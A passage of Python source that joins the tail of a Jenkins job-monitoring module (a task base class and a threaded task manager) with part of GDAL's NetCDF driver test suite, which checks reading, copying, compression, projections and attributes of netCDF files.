    A concrete task inherits this class and implements process().

    Attributes:
        url: Jenkins URL, e.g. 'http://1.1.1.1:8080'
        job_name: name of the monitored Jenkins job
        jenkins: JenkinsJob helper bound to url/user/passwd/job_name
        impl: a backend implementing the DataInterface methods
    '''
    def __init__(self, url, user, passwd, job_name, impl):
        self.url = url
        self.job_name = job_name
        self.jenkins = JenkinsJob(url, user, passwd, job_name)
        self.impl = impl

    @abstractmethod
    def process(self):
        # Concrete tasks produce their monitoring result here.
        raise NotImplementedError

    def run(self):
        """Collect this task's result and hand it to the backend."""
        outcome = self.process()
        return self.impl.publish_result(outcome, self.url, self.job_name)
class JenkinsMonitorManager(object):
    '''
    Brings all monitoring tasks up: one thread per task, then waits until
    every thread finishes. For a large number of tasks a thread pool
    would be preferable to this simple model.
    '''
    def __init__(self, tasks):
        # tasks: iterable of objects exposing a run() method
        self.tasks = tasks
        self.thread_list = []

    def run(self):
        """Start one thread per task and block until all of them are done."""
        for task in self.tasks:
            self.thread_list.append(threading.Thread(target=task.run))

        logger.info("tasks began.")
        for worker in self.thread_list:
            worker.start()

        # wait for every worker thread to terminate
        for worker in self.thread_list:
            worker.join()
        logger.info("tasks done.")
if __name__ == '__main__':
    # Library module — no standalone entry point yet.
    pass
|
netcdf.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2016, Even Rouault <even.rouault at spatialys.com>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
import struct
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
sys.path.append( '../pymod' )
import gdaltest
import test_cli_utilities
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
def netcdf_setup():
    """Detect the GDAL netCDF driver and record its capabilities on gdaltest.

    Sets gdaltest.netcdf_drv / _drv_version / _drv_has_nc2 / _drv_has_nc4 /
    _drv_has_hdf4 for later tests. Returns 'skip' when the driver is
    unavailable, 'success' otherwise.
    """
    gdaltest.netcdf_drv_version = 'unknown'
    gdaltest.netcdf_drv_has_nc2 = False
    gdaltest.netcdf_drv_has_nc4 = False
    gdaltest.netcdf_drv_has_hdf4 = False
    gdaltest.netcdf_drv_silent = False

    gdaltest.netcdf_drv = gdal.GetDriverByName( 'NETCDF' )
    if gdaltest.netcdf_drv is None:
        print('NOTICE: netcdf not supported, skipping checks')
        return 'skip'

    # get capabilities from driver
    metadata = gdaltest.netcdf_drv.GetMetadata()
    if metadata is None:
        print('NOTICE: netcdf metadata not found, skipping checks')
        return 'skip'

    # Example version strings being parsed:
    #   netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
    #   netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
    if 'NETCDF_VERSION' in metadata:
        v = metadata['NETCDF_VERSION']
        # keep the leading version token and strip optional quotes
        v = v[ 0 : v.find(' ') ].strip('"')
        gdaltest.netcdf_drv_version = v

    if 'NETCDF_HAS_NC2' in metadata \
       and metadata['NETCDF_HAS_NC2'] == 'YES':
        gdaltest.netcdf_drv_has_nc2 = True

    if 'NETCDF_HAS_NC4' in metadata \
       and metadata['NETCDF_HAS_NC4'] == 'YES':
        gdaltest.netcdf_drv_has_nc4 = True

    if 'NETCDF_HAS_HDF4' in metadata \
       and metadata['NETCDF_HAS_HDF4'] == 'YES':
        gdaltest.netcdf_drv_has_hdf4 = True

    print( 'NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version + \
           ' has_nc2: '+str(gdaltest.netcdf_drv_has_nc2)+' has_nc4: ' + \
           str(gdaltest.netcdf_drv_has_nc4) )

    return 'success'
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy( ifile, band, checksum, ofile, opts=[], driver='NETCDF' ):
    """Copy *ifile* with CreateCopy and verify *band* against *checksum*.

    Kept as a module-level helper so Process() can pickle it for the
    timeout variant. (The *driver* parameter is accepted but unused here.)
    """
    copy_test = gdaltest.GDALTest('NETCDF', '../' + ifile, band, checksum, options=opts)
    return copy_test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile,
                                    delete_copy=0, check_minmax=0)
###############################################################################
#test file copy, optional timeout arg
def netcdf_test_copy_timeout( ifile, band, checksum, ofile, opts=[], driver='NETCDF', timeout=None ):
    """Like netcdf_test_copy(), but optionally abort after *timeout* seconds.

    With a timeout, the copy runs in a child process so that a hung GDAL
    call can be terminated; returns 'success' or 'fail'.
    """
    from multiprocessing import Process

    drv = gdal.GetDriverByName( driver )
    if os.path.exists( ofile ):
        drv.Delete( ofile )

    if timeout is None:
        # no timeout requested: run in-process
        return netcdf_test_copy( ifile, band, checksum, ofile, opts, driver )

    result = 'success'
    sys.stdout.write('.')
    sys.stdout.flush()

    proc = Process( target=netcdf_test_copy, args=(ifile, band, checksum, ofile, opts ) )
    proc.start()
    proc.join( timeout )

    # if proc is alive after timeout we must terminate it, and return fail
    # valgrind detects memory leaks when this occurs (although it should never happen)
    if proc.is_alive():
        proc.terminate()
        if os.path.exists( ofile ):
            drv.Delete( ofile )
        print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout) )
        result = 'fail'

    return result
###############################################################################
#check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate( ifile, checksum, zlevel=1, timeout=None ):
    """Check DEFLATE compression support (requires netCDF-4/HDF5 + zlib).

    Copies *ifile* twice — uncompressed and DEFLATE-compressed at *zlevel*
    — and verifies the compressed output is strictly smaller. Returns
    'success', 'fail', or 'skip' when prerequisites are missing.
    """
    try:
        # the timeout machinery needs multiprocessing with Process.is_alive
        from multiprocessing import Process
        Process.is_alive
    except:
        print('from multiprocessing import Process failed')
        return 'skip'

    if gdaltest.netcdf_drv is None:
        return 'skip'

    if not gdaltest.netcdf_drv_has_nc4:
        # DEFLATE requires the netCDF-4 (HDF5) format
        return 'skip'

    ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
    ofile1_opts = [ 'FORMAT=NC4C', 'COMPRESS=NONE']
    ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
    ofile2_opts = [ 'FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL='+str(zlevel) ]

    if not os.path.exists( ifile ):
        gdaltest.post_reason( 'ifile %s does not exist' % ifile )
        return 'fail'

    result1 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile1, ofile1_opts, 'NETCDF', timeout )
    result2 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile2, ofile2_opts, 'NETCDF', timeout )

    if result1 == 'fail' or result2 == 'fail':
        return 'fail'

    # make sure compressed file is smaller than uncompressed files
    try:
        size1 = os.path.getsize( ofile1 )
        size2 = os.path.getsize( ofile2 )
    except:
        gdaltest.post_reason( 'Error getting file sizes.' )
        return 'fail'

    if size2 >= size1:
        gdaltest.post_reason( 'Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation' )
        return 'fail'

    return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_check_vars( ifile, vals_global=None, vals_band=None ):
    """Open ifile and verify its nodata value plus expected metadata.

    vals_global / vals_band map metadata keys to expected string values for
    the dataset and for band 1 respectively; either may be None to skip.
    Returns 'success' or 'fail' (with gdaltest.post_reason set).
    """
    src_ds = gdal.Open( ifile )
    if src_ds is None:
        gdaltest.post_reason( 'could not open dataset ' + ifile )
        return 'fail'
    metadata_global = src_ds.GetMetadata()
    if metadata_global is None:
        gdaltest.post_reason( 'could not get global metadata from ' + ifile )
        return 'fail'
    missval = src_ds.GetRasterBand(1).GetNoDataValue()
    if missval != 1:
        gdaltest.post_reason( 'got invalid nodata value %s for Band' % str(missval) )
        return 'fail'
    metadata_band = src_ds.GetRasterBand(1).GetMetadata()
    if metadata_band is None:
        gdaltest.post_reason( 'could not get Band metadata' )
        return 'fail'
    # validate both metadata dicts with one shared loop (this code was
    # previously duplicated verbatim for global and band metadata)
    for metadata, vals in ( (metadata_global, vals_global),
                            (metadata_band, vals_band) ):
        if vals is None:
            vals = dict()
        for k, v in vals.items():
            if k not in metadata:
                gdaltest.post_reason("missing metadata [%s]" % (str(k)))
                return 'fail'
            # strip { and } as new driver uses these for array values
            mk = metadata[k].lstrip('{ ').rstrip('} ')
            if mk != v:
                gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]" \
                                     % (str(mk),str(k),str(v)))
                return 'fail'
    return 'success'
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def netcdf_1():
    """Perform a simple read test on a netCDF subdataset."""
    # initialize the netcdf test environment
    netcdf_setup()
    if gdaltest.netcdf_drv is None:
        return 'skip'
    test_case = gdaltest.GDALTest( 'NetCDF', 'NETCDF:"data/bug636.nc":tas',
                                   1, 31621, filename_absolute = 1 )
    # Silence the 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute'
    # message so it does not pollute the test stream output.
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    outcome = test_case.testOpen()
    gdal.PopErrorHandler()
    return outcome
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessible via subdatasets.
def netcdf_2():
    """Verify a simple CreateCopy operation and its projection round-trip.

    The trivial gdaltest createcopy path can't be used because the new file
    is only accessible via subdatasets.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # copy a plain UTM GeoTIFF into a netCDF file
    src_ds = gdal.Open( 'data/byte.tif' )
    gdaltest.netcdf_drv.CreateCopy( 'tmp/netcdf2.nc', src_ds)
    tst = gdaltest.GDALTest( 'NetCDF', 'tmp/netcdf2.nc',
                             1, 4672,
                             filename_absolute = 1 )
    # expected SRS of data/byte.tif: NAD27 / UTM zone 11N
    wkt = """PROJCS["NAD27 / UTM zone 11N",
    GEOGCS["NAD27",
        DATUM["North_American_Datum_1927",
            SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
                AUTHORITY["EPSG","7008"]],
            AUTHORITY["EPSG","6267"]],
        PRIMEM["Greenwich",0],
        UNIT["degree",0.0174532925199433],
        AUTHORITY["EPSG","4267"]],
    PROJECTION["Transverse_Mercator"],
    PARAMETER["latitude_of_origin",0],
    PARAMETER["central_meridian",-117],
    PARAMETER["scale_factor",0.9996],
    PARAMETER["false_easting",500000],
    PARAMETER["false_northing",0],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AUTHORITY["EPSG","26711"]]"""
    # reopen the copy and compare checksum + projection against the WKT
    result = tst.testOpen( check_prj = wkt )
    if result != 'success':
        return result
    # Test that in raster-only mode, update isn't supported (not sure what would be missing for that...)
    with gdaltest.error_handler():
        ds = gdal.Open( 'tmp/netcdf2.nc', gdal.GA_Update )
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    gdaltest.clean_tmp()
    return 'success'
###############################################################################
def netcdf_3():
    """Check ComputeRasterMinMax() on a GMT-style grid file."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/sombrero.grd' )
    band = dataset.GetRasterBand(1)
    low, high = band.ComputeRasterMinMax()
    in_range = (abs(low - (-0.675758)) <= 0.000001
                and abs(high - 1.0) <= 0.000001)
    band = None
    dataset = None
    if not in_range:
        gdaltest.post_reason( 'Wrong min or max.' )
        return 'fail'
    return 'success'
###############################################################################
# In #2582 5dimensional files were causing problems. Verify use ok.
def netcdf_4():
    """Read band 3 of a 5-dimensional file (regression for #2582)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    test_case = gdaltest.GDALTest( 'NetCDF',
                                   'NETCDF:data/foo_5dimensional.nc:temperature',
                                   3, 1218, filename_absolute = 1 )
    # Quiet the 'No UNIDATA NC_GLOBAL:Conventions attribute' warning so the
    # test stream output stays clean.
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    # checksum is not verified (see bug #4284)
    outcome = test_case.testOpen(skip_checksum = True)
    gdal.PopErrorHandler()
    return outcome
###############################################################################
# In #2583 5dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def netcdf_5():
    """Read band 7 of a 5-dimensional file — checks that the highest
    dimension unrolls correctly (regression for #2583)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    test_case = gdaltest.GDALTest( 'NetCDF',
                                   'NETCDF:data/foo_5dimensional.nc:temperature',
                                   7, 1227, filename_absolute = 1 )
    # Quiet the 'No UNIDATA NC_GLOBAL:Conventions attribute' warning so the
    # test stream output stays clean.
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    # checksum is not verified (see bug #4284)
    outcome = test_case.testOpen(skip_checksum = True)
    gdal.PopErrorHandler()
    return outcome
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#1 standard parallel.
def netcdf_6():
    """Ticket #3324: CF-1.4 Lambert conformal with 1 standard parallel."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_lcc1sp.nc' )
    spatial_ref = osr.SpatialReference( )
    spatial_ref.ImportFromWkt( dataset.GetProjection( ) )
    lat_origin = spatial_ref.GetProjParm( 'latitude_of_origin' )
    dataset = None
    if lat_origin != 25:
        gdaltest.post_reason( 'Latitude of origin does not match expected:\n%f'
                              % lat_origin )
        return 'fail'
    return 'success'
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#2 standard parallels.
def netcdf_7():
    """Ticket #3324: CF-1.4 Lambert conformal with 2 standard parallels."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_lcc2sp.nc' )
    spatial_ref = osr.SpatialReference( )
    spatial_ref.ImportFromWkt( dataset.GetProjection( ) )
    parallel_1 = spatial_ref.GetProjParm( 'standard_parallel_1' )
    parallel_2 = spatial_ref.GetProjParm( 'standard_parallel_2' )
    dataset = None
    spatial_ref = None
    if parallel_1 != 33.0 or parallel_2 != 45.0:
        gdaltest.post_reason( 'Standard Parallels do not match expected:\n%f,%f'
                              % ( parallel_1, parallel_2 ) )
        return 'fail'
    return 'success'
###############################################################################
#check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def netcdf_8():
    """CF-convention read of Albers Equal Area.

    Earlier versions compared the whole WKT, which varies slightly between
    driver versions; now we only check PROJECTION and two parameters.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_aea2sp_invf.nc' )
    spatial_ref = osr.SpatialReference( )
    spatial_ref.ImportFromWkt( dataset.GetProjection( ) )
    dataset = None
    projection = spatial_ref.GetAttrValue( 'PROJECTION' )
    if projection != 'Albers_Conic_Equal_Area':
        gdaltest.post_reason( 'Projection does not match expected : ' + projection )
        return 'fail'
    # check two representative projection parameters
    for parm_name, expected in ( ('latitude_of_center', 37.5),
                                 ('longitude_of_center', -96) ):
        param = spatial_ref.GetProjParm(parm_name)
        if param != expected:
            gdaltest.post_reason( 'Got wrong parameter value (%g)' % param )
            return 'fail'
    return 'success'
###############################################################################
#check to see if projected systems default to wgs84 if no spheroid def
def netcdf_9():
    """Projected systems must default to WGS84 when no spheroid is defined."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_no_sphere.nc' )
    spatial_ref = osr.SpatialReference( )
    spatial_ref.ImportFromWkt( dataset.GetProjection( ) )
    spheroid = spatial_ref.GetAttrValue( 'SPHEROID' )
    dataset = None
    spatial_ref = None
    if spheroid != 'WGS 84':
        gdaltest.post_reason( 'Incorrect spheroid read from file\n%s'
                              % ( spheroid ) )
        return 'fail'
    return 'success'
###############################################################################
#check if km pixel size makes it through to gt
def netcdf_10():
    """Check that a km pixel size makes it through to the geotransform."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_no_sphere.nc' )
    projection = dataset.GetProjection( )
    gt = dataset.GetGeoTransform( )
    dataset = None
    # geotransform with km values scaled to metres
    gt_metres = ( -1897186.0290038721, 5079.3608398440065,
                  0.0,2674684.0244560046,
                  0.0,-5079.4721679684635 )
    # geotransform left in km, with the unit carried in the SRS instead
    gt_km = ( -1897.186029003872, 5.079360839844003,
              0.0, 2674.6840244560044,
              0.0,-5.079472167968456 )
    if gt != gt_metres:
        spatial_ref = osr.SpatialReference()
        spatial_ref.ImportFromWkt( projection )
        # newer driver keeps km values and records UNIT=1000 in the PROJCS
        # instead of scaling the geotransform itself
        if not (spatial_ref.GetAttrValue("PROJCS|UNIT",1)=="1000" and gt == gt_km) :
            gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
            return 'fail'
    return 'success'
###############################################################################
#check if ll gets caught in km pixel size check
def netcdf_11():
    """A lat/lon grid must not be caught by the km pixel-size check."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/cf_geog.nc' )
    gt = dataset.GetGeoTransform( )
    dataset = None
    expected = (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0)
    if gt != expected:
        gdaltest.post_reason( 'Incorrect geotransform' )
        return 'fail'
    return 'success'
###############################################################################
#check for scale/offset set/get.
def netcdf_12():
    """Check scale/offset are read from the file."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/scale_offset.nc' )
    band = dataset.GetRasterBand( 1 )
    scale = band.GetScale()
    offset = band.GetOffset()
    band = None
    dataset = None
    if scale != 0.01 or offset != 1.5:
        gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
        return 'fail'
    return 'success'
###############################################################################
#check for scale/offset = None if no scale or offset is available
def netcdf_13():
    """Scale/offset must both be None when the file defines neither."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.Open( 'data/no_scale_offset.nc' )
    scale = ds.GetRasterBand( 1 ).GetScale()
    offset = ds.GetRasterBand( 1 ).GetOffset()
    # idiom fix: compare against None with 'is not', not '!=' (PEP 8)
    if scale is not None or offset is not None:
        gdaltest.post_reason( 'Incorrect scale or offset' )
        return 'fail'
    ds = None
    return 'success'
###############################################################################
#check for scale/offset for two variables
def netcdf_14():
    """Check scale/offset are read independently for each of two variables."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:z' )
    scale = ds.GetRasterBand( 1 ).GetScale()
    offset = ds.GetRasterBand( 1 ).GetOffset()
    if scale != 0.01 or offset != 1.5:
        gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
        return 'fail'
    ds = None
    ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:q' )
    # cleanup: GetScale()/GetOffset() were previously called twice in a row
    scale = ds.GetRasterBand( 1 ).GetScale()
    offset = ds.GetRasterBand( 1 ).GetOffset()
    if scale != 0.1 or offset != 2.5:
        gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
        return 'fail'
    # release the second dataset as well (was previously leaked)
    ds = None
    return 'success'
###############################################################################
#check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def netcdf_15():
    """Check support for netcdf-2 (64-bit offset) files.

    This test fails in 1.8.1, because the driver does not support NC2
    (bug #3890).
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # restructured as guard clauses; the original had an unreachable
    # trailing 'return success' after an if/else where both branches returned
    if not gdaltest.netcdf_drv_has_nc2:
        return 'skip'
    ds = gdal.Open( 'data/trmm-nc2.nc' )
    if ds is None:
        return 'fail'
    ds = None
    return 'success'
###############################################################################
#check support for netcdf-4
def netcdf_16():
    """Check support for netcdf-4: the file must both open with and be
    identified by the netCDF driver (and not e.g. HDF5Image)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    ifile = 'data/trmm-nc4.nc'
    # test with Open()
    ds = gdal.Open( ifile )
    if ds is None:
        gdaltest.post_reason('GDAL did not open file')
        return 'fail'
    driver_name = ds.GetDriver().GetDescription()
    ds = None
    # fail if another driver (i.e. HDF5Image) grabbed the file
    if driver_name != 'netCDF':
        gdaltest.post_reason('netcdf driver did not open file')
        return 'fail'
    # test with Identify()
    driver_name = gdal.IdentifyDriver( ifile ).GetDescription()
    if driver_name != 'netCDF':
        gdaltest.post_reason('netcdf driver did not identify file')
        return 'fail'
    return 'success'
###############################################################################
#check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def netcdf_17():
    """netcdf-4: make sure an hdf5 file is NOT read by the netcdf driver."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ifile = 'data/groups.h5'
    # skip test if Hdf5 is not enabled
    if gdal.GetDriverByName( 'HDF5' ) is None and \
       gdal.GetDriverByName( 'HDF5Image' ) is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    # test with Open()
    ds = gdal.Open( ifile )
    if ds is None:
        gdaltest.post_reason('GDAL did not open hdf5 file')
        return 'fail'
    driver_name = ds.GetDriver().GetDescription()
    ds = None
    # fail if the netCDF driver claimed the hdf5 file
    if driver_name == 'netCDF':
        gdaltest.post_reason('netcdf driver opened hdf5 file')
        return 'fail'
    # test with Identify()
    driver_name = gdal.IdentifyDriver( ifile ).GetDescription()
    if driver_name == 'netCDF':
        gdaltest.post_reason('netcdf driver was identified for hdf5 file')
        return 'fail'
    return 'success'
###############################################################################
#check support for netcdf-4 classic (NC4C)
def netcdf_18():
    """Check support for netcdf-4 classic (NC4C) files."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    ifile = 'data/trmm-nc4c.nc'
    # test with Open()
    ds = gdal.Open( ifile )
    if ds is None:
        return 'fail'
    driver_name = ds.GetDriver().GetDescription()
    ds = None
    # fail if another driver (i.e. HDF5Image) grabbed the file
    if driver_name != 'netCDF':
        return 'fail'
    # test with Identify()
    if gdal.IdentifyDriver( ifile ).GetDescription() != 'netCDF':
        return 'fail'
    return 'success'
###############################################################################
#check support for reading with DEFLATE compression, requires NC4
def netcdf_19():
    """Check reading a DEFLATE-compressed file (requires NC4)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    test_case = gdaltest.GDALTest( 'NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
                                   filename_absolute = 1 )
    return test_case.testOpen(skip_checksum = True)
###############################################################################
#check support for writing with DEFLATE compression, requires NC4
def netcdf_20():
    """Check writing with DEFLATE compression (requires NC4)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    # a simple test on a tiny file is sufficient here
    return netcdf_test_deflate( 'data/utm.tif', 50235 )
###############################################################################
#check support for writing large file with DEFLATE compression
#if chunking is not defined properly within the netcdf driver, this test can take 1h
def netcdf_21():
    """Check writing a large file with DEFLATE compression.

    If chunking is not defined properly within the netcdf driver, this test
    can take about an hour, hence the 60 s timeout below.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    if not gdaltest.run_slow_tests():
        return 'skip'
    bigfile = 'tmp/cache/utm-big.tif'
    sys.stdout.write('.')
    sys.stdout.flush()
    # create cache dir if absent
    if not os.path.exists( 'tmp/cache' ):
        os.mkdir( 'tmp/cache' )
    # look for large gtiff in cache; build it with gdalwarp on first run
    if not os.path.exists( bigfile ):
        # create large gtiff
        if test_cli_utilities.get_gdalwarp_path() is None:
            gdaltest.post_reason('gdalwarp not found')
            return 'skip'
        warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
            ' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
            'data/utm.tif ' + bigfile
        try:
            (ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
        except:
            gdaltest.post_reason('gdalwarp execution failed')
            return 'fail'
        # gdalwarp runs with -q, so any output on stdout/stderr is an error
        if ( err != '' or ret != '' ):
            gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
            return 'fail'
    # test compression of the file, with a conservative timeout of 60 seconds
    return netcdf_test_deflate( bigfile, 26695, 6, 60 )
###############################################################################
#check support for hdf4
def netcdf_22():
    """Check support for reading hdf4 files via the netcdf driver."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_hdf4:
        return 'skip'
    hdf4_file = 'data/hdifftst2.hdf'
    # suppress warning while opening
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    ds = gdal.Open( 'NETCDF:' + hdf4_file )
    gdal.PopErrorHandler()
    if ds is None:
        gdaltest.post_reason('netcdf driver did not open hdf4 file')
        return 'fail'
    ds = None
    return 'success'
###############################################################################
#check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def netcdf_23():
    """Make sure an hdf4 file is NOT read by the netcdf driver.

    Deliberately does NOT skip when netcdf support is disabled in GDAL:
    the check is about which driver claims the file.
    """
    # skip test if Hdf4 is not enabled in GDAL
    if gdal.GetDriverByName( 'HDF4' ) is None and \
       gdal.GetDriverByName( 'HDF4Image' ) is None:
        return 'skip'
    hdf4_file = 'data/hdifftst2.hdf'
    # test with Open()
    ds = gdal.Open( hdf4_file )
    if ds is None:
        gdaltest.post_reason('GDAL did not open hdf4 file')
        return 'fail'
    driver_name = ds.GetDriver().GetDescription()
    ds = None
    # fail if the netCDF driver claimed the hdf4 file
    if driver_name == 'netCDF':
        gdaltest.post_reason('netcdf driver opened hdf4 file')
        return 'fail'
    # test with Identify()
    driver_name = gdal.IdentifyDriver( hdf4_file ).GetDescription()
    if driver_name == 'netCDF':
        gdaltest.post_reason('netcdf driver was identified for hdf4 file')
        return 'fail'
    return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_24():
    """Check reading attributes, both single values and array values."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    expected_global = {'NC_GLOBAL#test': 'testval',
                       'NC_GLOBAL#valid_range_i': '0,255',
                       'NC_GLOBAL#valid_min': '10.1',
                       'NC_GLOBAL#test_b': '1'}
    expected_band = {'_Unsigned': 'true',
                     'valid_min': '10.1',
                     'valid_range_b': '1,10',
                     'valid_range_d': '0.1111112222222,255.555555555556',
                     'valid_range_f': '0.1111111,255.5556',
                     'valid_range_s': '0,255'}
    return netcdf_check_vars( 'data/nc_vars.nc', expected_global, expected_band )
###############################################################################
# check support for NC4 reading attributes (single values and array values)
def netcdf_24_nc4():
    """Check NC4 reading of attributes (single values and array values)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    vals_global = {'NC_GLOBAL#test': 'testval',
                   'NC_GLOBAL#test_string': 'testval_string',
                   'NC_GLOBAL#valid_range_i': '0,255',
                   'NC_GLOBAL#valid_min': '10.1',
                   'NC_GLOBAL#test_b': '-100',
                   'NC_GLOBAL#test_ub': '200',
                   'NC_GLOBAL#test_s': '-16000',
                   'NC_GLOBAL#test_us': '32000',
                   'NC_GLOBAL#test_l': '-2000000000',
                   'NC_GLOBAL#test_ul': '4000000000'}
    # cleanup: 'valid_range_s' appeared twice in this literal (same value);
    # the duplicate entry has been removed
    vals_band = {'test_string_arr': 'test,string,arr',
                 'valid_min': '10.1',
                 'valid_range_b': '1,10',
                 'valid_range_ub': '1,200',
                 'valid_range_s': '0,255',
                 'valid_range_us': '0,32000',
                 'valid_range_l': '0,255',
                 'valid_range_ul': '0,4000000000',
                 'valid_range_d': '0.1111112222222,255.555555555556',
                 'valid_range_f': '0.1111111,255.5556'}
    return netcdf_check_vars( 'data/nc4_vars.nc', vals_global, vals_band )
###############################################################################
# check support for writing attributes (single values and array values)
def netcdf_25():
    """Check writing attributes (single values and array values) by copying
    the file and re-checking the metadata on the copy."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    copy_result = netcdf_test_copy( 'data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc' )
    if copy_result != 'success':
        return copy_result
    expected_global = {'NC_GLOBAL#test': 'testval',
                       'NC_GLOBAL#valid_range_i': '0,255',
                       'NC_GLOBAL#valid_min': '10.1',
                       'NC_GLOBAL#test_b': '1'}
    expected_band = {'_Unsigned': 'true',
                     'valid_min': '10.1',
                     'valid_range_b': '1,10',
                     'valid_range_d': '0.1111112222222,255.555555555556',
                     'valid_range_f': '0.1111111,255.5556',
                     'valid_range_s': '0,255'}
